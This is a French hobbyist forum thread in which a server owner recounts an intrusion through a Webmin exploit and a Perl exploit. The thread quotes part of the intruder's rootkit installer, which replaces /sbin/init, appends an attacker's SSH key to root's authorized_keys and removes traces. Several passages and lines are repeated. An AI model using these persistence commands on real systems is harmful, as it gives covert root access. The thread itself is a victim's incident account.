Se connecter
Inscription
Mot de passe perdu
Poster une réponse à un sujet: Ouh le vilain pirate :o
Attention, ce sujet est un sujet ancien (7571 jours sans réponse)
T'es un as zion 
On t'aime
On t'aime
ayé, tout est censé refonctionner les enfants... pfiouf
saloperie va
saloperie va
Ben voilà t'es pas riche mais au moins t'es célèbre... 
mickael> de fait, donc bon, un firewall soft, j'en vois pas l'utilité... suffit d'un bon outil de monitoring pour voir ce qu'il se passe, et en 2 ans, c'est la première fois que ca m'arrive, et par faute d'un upgrade oublié, pas vu ou inexistant 
(apparemment y en a pas encore si j'utilise urpmi, bien que je ne l'utilisais pas sur webmin).
quand je compare, ma machine a tenu vachement longtemps, je vais pas me plaindre, et vu qu'ils m'attaquent comme des bourrins depuis une semaine, les chances ne sont pas de mon côté.
Et quand je vois les multiples intrusions/dégats, il est fort probable qu'il y ait eu un concours sur ma tête
(apparemment y en a pas encore si j'utilise urpmi, bien que je ne l'utilisais pas sur webmin).quand je compare, ma machine a tenu vachement longtemps, je vais pas me plaindre, et vu qu'ils m'attaquent comme des bourrins depuis une semaine, les chances ne sont pas de mon côté.
Et quand je vois les multiples intrusions/dégats, il est fort probable qu'il y ait eu un concours sur ma tête
OK t'as pas tort, mais avec un serveur dédié tu n'as pas ça, tu n'as que ta machine à toi 
parce que spamassassin, webmin et pleins d'autres trucs ont besoin de perl 
mais perl a été utilisé au travers d'un exploit webmin... donc il a utilisé webmin, puis un exploit perl pour foutre un backdoor + key logger... Par contre, il a eu apparemment du mal à se connecter en ssh, logique, root y a pas accès
Il a tenté de rajouter sa clé RSA:
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA29D2P7P/WVC5VCGWTZfbrXV4Zmz/Qvf1FdQTOoiCvBzLLxrY0Ya- WLjJiMZcQ2Y1a4RIaEhRhdezj1yWECQc3DI/YvT58/9TJ8DYCbaDpvToryXGm0idgz2M7/3FQEUhbpPX- +2E3yMs7WaUg1VNf92W5x/ed/FbTJo2u9bqFfJaM= root@localhost" >> /root/.ssh/authorized_keys
un morceau du script pour le plaisir:
il a uploadé un pack d'une dizaine d'exploits en fait, puis il a tout testé le con
mais perl a été utilisé au travers d'un exploit webmin... donc il a utilisé webmin, puis un exploit perl pour foutre un backdoor + key logger... Par contre, il a eu apparemment du mal à se connecter en ssh, logique, root y a pas accès
Il a tenté de rajouter sa clé RSA:
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA29D2P7P/WVC5VCGWTZfbrXV4Zmz/Qvf1FdQTOoiCvBzLLxrY0Ya- WLjJiMZcQ2Y1a4RIaEhRhdezj1yWECQc3DI/YvT58/9TJ8DYCbaDpvToryXGm0idgz2M7/3FQEUhbpPX- +2E3yMs7WaUg1VNf92W5x/ed/FbTJo2u9bqFfJaM= root@localhost" >> /root/.ssh/authorized_keys
un morceau du script pour le plaisir:
chmod 0755 sk; if [ ! -f /sbin/init${H} ]; then cp -f /sbin/init /sbin/init${H}; fi; rm -f /sbin/init; cp sk /sbin/init
echo Your home is $D, go there and type ./sk to install
echo us into memory. Have fun!
mkdir -p /root/.ssh/
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA29D2P7P/WVC5VCGWTZfbrXV4Zmz/Qvf1FdQTOoiCvBzLLxrY0Ya- WLjJiMZcQ2Y1a4RIaEhRhdezj1yWECQc3DI/YvT58/9TJ8DYCbaDpvToryXGm0idgz2M7/3FQEUhbpPX- +2E3yMs7WaUg1VNf92W5x/ed/FbTJo2u9bqFfJaM= root@localhost" >> /root/.ssh/authorized_keys
cd $FD
cd ..
rm -rf local local.tgz
/usr/share/locale/sk/.sk12/sk
echo Your home is $D, go there and type ./sk to install
echo us into memory. Have fun!
mkdir -p /root/.ssh/
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA29D2P7P/WVC5VCGWTZfbrXV4Zmz/Qvf1FdQTOoiCvBzLLxrY0Ya- WLjJiMZcQ2Y1a4RIaEhRhdezj1yWECQc3DI/YvT58/9TJ8DYCbaDpvToryXGm0idgz2M7/3FQEUhbpPX- +2E3yMs7WaUg1VNf92W5x/ed/FbTJo2u9bqFfJaM= root@localhost" >> /root/.ssh/authorized_keys
cd $FD
cd ..
rm -rf local local.tgz
/usr/share/locale/sk/.sk12/sk
il a uploadé un pack d'une dizaine d'exploits en fait, puis il a tout testé le con
pk le perl est activé ? 
